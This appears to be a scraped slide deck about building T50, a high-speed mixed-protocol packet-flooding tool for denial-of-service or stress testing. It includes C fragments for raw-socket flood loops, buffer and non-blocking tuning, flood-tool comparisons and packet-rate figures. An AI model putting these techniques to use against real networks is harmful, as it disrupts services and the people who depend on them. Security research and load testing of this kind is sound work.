The hangover: A "modern" (?) high performance approach to build an offensive computing tool!

The Hangover
A “modern” (?) high performance approach to build an offensive computing tool!

Nelson Brito
nbrito[at]sekure[dot]org

Agenda

• 0000 – Introduction • 0101 – Results

• 0001 – Motivation • 0110 – Demonstration

• 0010 – “Hello World” Examples • 0111 – Conclusions

• 0011 – Lessons Learned • 1000 – Questions and Answers

• 0100 – Comparison

Goals
• Firstly, the primary goal of this research was to build a
“PERFECT” tool to use in my daily tasks.

• Secondly, provide me enough knowledge and perspective of
how network devices and computer systems behave under this
type of attack.

• Thirdly, prove that DoS was and still is a BIG ISSUE to whole
Internet infrastructure.

• Lastly, but not least:
– “The best is yet to come!”
• http://fnstenv.blogspot.com/2010/08/best-is-yet-to-come.html
– “A fake version of T50!!!”
• http://fnstenv.blogspot.com/2010/10/fake-version-of-t50.html

Why Denial-of-Service?
• Is there anything more offensive than a • But, what are the real damages? What
DoS, anyways? are the real motivations? Image?
– Bear in mind: DoS means “Stress Revenge? Financial? Political? Hactivism?
Testing” for this presentation.
• DoS attacks are significantly harmful,
• DoS tools are necessary weapons in a because they violate one of the three key
cyber warfare… concepts of security that are common to
risk management… Which one?
• Attacks against the infrastructure are – Confidentiality
more common than many people might – Integrity
think, and, when they happen, people – Availability
will certainly be aware of.

All the codes in this presentation were written in C language
and tested on real machines, rather than virtual machines.

0010 – “Hello World” Examples

“Hello World” Example 01

main() loop()
Signal() while()
kill() malloc()
memset()
memcpy()
Signal()
alarm()


main() loop()
Signal() while()
kill() memset()
memcpy()
Signal()
alarm()


main() loop()
Signal() while()
kill() memcpy()
Signal()
alarm()


main() loop()
while() malloc()
loop() memset()
memcpy()


main() loop()
while() memset()
loop() memcpy()


main() loop()
while() memcpy()
loop()

“Hello World” Examples Applied

Dell Latitude E6400 Dell Inspiron 910

0011 – Lessons Learned
Also known as “Tips and Tricks”

What is the “high-performance” definition?

English Language Computer Science
• Adj. • A code and/or program that solves any
– 1. Modified to give superior problem faster and more efficiently than
performance: ordinary codes / programs.
• “a high-performance car”
superior – of high or superior • A code and/or program which use all –
quality or performance; or as much as possible – computer’s
• “superior wisdom derived from resources available.
experience”;
• “superior math students”.

SOCKET(2)
• T50 Sukhoi PAK FA is capable to:
– Send protocol packets: ICMP, IGMP, TCP and UDP.
• NO BIG DEAL, right?
– Send ALL of them “ALMOST” on the same time – protocol “T50”!
• BIG DEAL! 8)

• How many sockets should the code use to send ALL of them “ALMOST” on the
same time?
– 1 socket file descriptor
– 2 socket file descriptors
– NONE

• “Just one socket file descriptor? Really?”

SOCKET(2) & SETSOCKOPT(2)
socket_t fd; int flags, n = 1, len, * nptr = &n; fd_set wfds;

[...]

if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
exit(EXIT_FAILURE);

if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, nptr, sizeof(n)) < 0)
exit(EXIT_FAILURE);

[...]

GETSOCKOPT(2) & SETSOCKOPT(2)

[...]

len = sizeof(n);

if(getsockopt(fd, SOL_SOCKET, SO_SNDBUF, &n, &len) == -1)
exit(EXIT_FAILURE);

for(n += 128 ; n < 1048576 ; n += 128){
if(setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &n, len) == -1){
if(errno == ENOBUFS)
break;
exit(EXIT_FAILURE);
}
}

[...]

FCNTL(2)

[...]

flags = fcntl(fd, F_GETFL, 0);

if(fcntl(fd, F_SETFL, flags|O_NONBLOCK) == -1)
exit(EXIT_FAILURE);

[...]

IOCTL(2)

[...]

if(ioctl(fd, FIONBIO, &n) == -1)
exit(EXIT_FAILURE);

[...]

SIGNAL(2) & SENDTO(2)

• “Signals are used to notify a process or thread of a particular
event. Many computer science researchers compare signals with
hardware interrupts, which occur when a hardware subsystem,
such as a disk I/O (input/output) interface, generates an
interrupt to a processor when the I/O completes.”
– Linux Journal (Issue 73, May 2000) – By Moshe Bar

• “Signals also have been used to communicate and synchronize
processes and to simplify interprocess communications (IPCs).
Although we now have advanced synchronization tools and
many IPC mechanisms, signals play a vital role in Linux for
handling exceptions and interrupts. Signals have been used for
approximately 30 years without any major modifications.”
– Linux Journal (Issue 107, March 2003) – By B. Thangaraju

SIGNAL(2) & SENDTO(2)
[...]

signal(SIGPIPE, SIG_IGN);

[...]

redo:
if(sendto(fd, &p, p_sz, 0|MSG_NOSIGNAL, &sin, sizeof(sin)) == -1){
if(errno == EPERM)
goto redo;
else
exit(EXIT_FAILURE);
}

[...]

SELECT(2)

[...]

while(flood || threshold--){
FD_ZERO(&wfds);
FD_SET(fd, &wfds);

if(select(fd + 1, NULL, &wfds, NULL, NULL) == -1)
exit(EXIT_FAILURE);

if(FD_ISSET(fd, &wfds)){

[...]

PSELECT(2)

[...]

while(flood || threshold--){
FD_ZERO(&wfds);
FD_SET(fd, &wfds);

if(pselect(fd + 1, NULL, &wfds, NULL, NULL, NULL) == -1)
exit(EXIT_FAILURE);

if(FD_ISSET(fd, &wfds)){

[...]

SLEEP(3)
• Should the code “sleep()”?
– Yes
– No

• Should the code “usleep()”?
– Yes
– No

• Should the code “nanosleep()”?
– Yes
– No

• The code must never SLEEP(3), USLEEP(3) or
NANOSLEEP(3).

RAND(3)

• “short” (16-bit)
– Which one is faster creating random?
• ((rand()&0xffff)<<8)+(rand()&0xffff)
•1+(short)(65535.0*rand()/(RAND_MAX+1.0))

• “int” (32-bit)
– Which one is faster creating random?
• ((rand()&0xffffffff)<<16)+(rand()&0xffffffff)
•1+(int)(4294967295.0*rand()/(RAND_MAX+1.0))

RAND(3)

Dell Latitude E6400 Dell Inspiron 910

What else?
• Choose using local variables rather than global variables.

• Choose using “__inline__” in header file (*.h) and “inline” in source code
(*.c), enabling GCC switch options:
– “-finline-functions” (-O3)
– “-fkeep-inline-functions”

• Choose using “void” if you do not have to check the “return()” of some
“function()”.

• Should the code use “unsigned” or “signed”?

• Should the code use “fork()” or “pthread_*()”?

• Etc... And by “etc…” I mean…

• Ohh… I almost forgot!!! Make the code RFC 1918 Compliance.

com.par.i.son

English Language C Language (Operators)
• n. • To test for equality is “==”.
1. • To test for inequality is “!=”.
a.The act of comparing or the • Other operators:
process of being compared. – “<” (less than)
b. A statement or estimate of – “>” (greater than)
similarities and differences. – “<=” (less than or equals)
2. The quality of being similar or – “>=” (greater than or equals)
equivalent; likeness: no
comparison between the two
books.
3. …

com.par.i.son

TCP Flood UDP Flood
• C4 by live • Geminid by live
• Geminid by live • B52 by Nelson Brito
• Mausezahn by Herbert Haas
• Mausezahn by Herbert Haas
• F22 by Nelson Brito
• [L]OTUS by labsec team • HPING3 by Salvatore Sanfilippo*
• HPING3 by Salvatore Sanfilippo*

ICMP Flood IGMP
• Geminid by live • STRESSER-0.7 by Shen139?
• Mausezahn by Herbert Haas – Please, don’t be silly!!!
• HPING3 by Salvatore Sanfilippo*

Why do I keep saying “ALMOST”?

Minimum Frame Size (MFS)
• The maximum packet size is 1518 bytes, although to allow the Q-tag for Virtual
LAN and priority data in 802.3ac it is extended to 1522 bytes.

• If the upper layer protocol submits a protocol data unit (PDU) less than 64 bytes,
802.3 will pad the data field to achieve the minimum 64 bytes.

• The Minimum Frame Size will then always be of 64 bytes, but…
– The Minimum Frame Size is related to the distance which the network spans, the type of
media being used and the number of repeaters which the signal may have to pass
through to reach the furthest part of the LAN.

Maximum Packets per Second (PPS) – 64 bytes

100BASE-TX 1000BASE-T
• 100 Mbps • 1 Gbps
• 100,000,000 bits/sec • 1,000,000,000 bits/sec
• 12,500,000 bytes/sec • 125,000,000 bytes/sec
• 195,312.50 pps • 1,953,125.00 pps

Maximum Packets per Second (PPS) – 88 bytes

• 100 Mbps • 1 Gbps
• 100,000,000 bits/sec • 1,000,000,000 bits/sec
• 12,500,000 bytes/sec • 125,000,000 bytes/sec
• 142,045.50 pps • 1,420,455.00 pps

TCP Flood


UDP Flood


ICMP Flood


T50 Sukhoi PAK FA Mixed Packet Injector Tool

Dell Latitude E6400 Dell Latitude D620
• Intel® Core™ 2 Duo P8400 (2.26 GHz) • Intel® Core™ Duo T5600 (1.83 GHz)
• Memory 4GB RAM • Memory 2GB RAM
• Ubuntu Desktop Linux 10.04 64-bit • Microsoft Windows 7 32-bit
• Intel® 82567LM Gigabit Controller • Broadcom NetXtreme 57xx Gigabit
• 1 Gbps Network Controller
• Cross-over Cable (CAT-5e) • 1 Gbps Network
• Cross-over Cable (CAT-5e)

http://j.mp/T50-Demo
Demonstration!

Conclusions
• Can be applied to any DoS: • Can be considered a cyber warfare’s
– Peer-to-Peer Attacks weapon?
– Application Level Attacks – Yes, it can be considered like one.
– Distributed Attacks
– Reflected Attacks • It is just a matter of time to things get
– Level-2 Attacks worse on the Internet.
– Degradation-of-Service Attacks
– DNS Amplifiers Attacks • A DoS can be perpetrated overnight!

• Is DoS and DDoS so 1990’s? • What else?
– Please, don’t be silly, again!!!

An attacker does not even need multiples zombies.

The hangover: A "modern" (?) high performance approach to build an offensive computing tool!

The hangover: A "modern" (?) high performance approach to build an offensive computing tool!

More Related Content

What's hot (20)

Viewers also liked (20)

Similar to The hangover: A "modern" (?) high performance approach to build an offensive computing tool! (20)

More from Nelson Brito (9)

Recently uploaded (20)

The hangover: A "modern" (?) high performance approach to build an offensive computing tool!